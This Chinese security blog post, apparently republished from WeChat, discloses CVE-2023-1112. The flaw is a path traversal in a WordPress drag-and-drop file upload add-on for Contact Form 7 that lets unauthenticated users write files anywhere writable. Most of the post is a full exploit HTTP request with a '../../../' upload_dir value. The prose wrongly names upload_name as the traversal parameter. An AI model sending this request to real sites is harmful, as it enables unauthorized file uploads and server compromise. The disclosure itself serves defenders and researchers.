WordPress制作联系表单的插件Contact Form 7(免费插件)的漏洞
CVE-2023-1112 -拖放多文件上传器PRO -联系表7 v5.0.6.1路径遍历
信息
拖放多文件上传程序PRO - Contact Form 7,允许未经身份验证的远程攻击者将文件上传到远程服务器上的任何可写位置(CVE-2023-1112)。
要利用此漏洞,攻击者需要使用插件的表单上载文件。在这个发布请求中,需要有参数upload_name
,该值是文件将被上载到的文件夹的名称。攻击者可以放置任何他想要的东西,例如../
,../../../
、 foldername
(它将在上传目录上创建文件夹“foldername”)等。
示例
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.org
Content-Length: 756
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIzvIrbHjHpxzepPi
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="size_limit"
2e+9
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="action"
dnd_codedropz_upload
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_dir"
../../../
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="post_id"
1868
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="security"
0a4dca2b89
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="form_id"
9210
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_name"
foto
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload-file"; filename="pngout.png"
Content-Type: image/png
// image contents
------WebKitFormBoundaryIzvIrbHjHpxzepPi--
截图
正常请求
恶意请求
恶意请求已成功将文件上载到Web服务器根目录
项目地址:
https://github.com/Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal
原文始发于微信公众号(蓝猫Sec):CVE-2023-1112--WordPress--Contact Form路径遍历文件上传
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论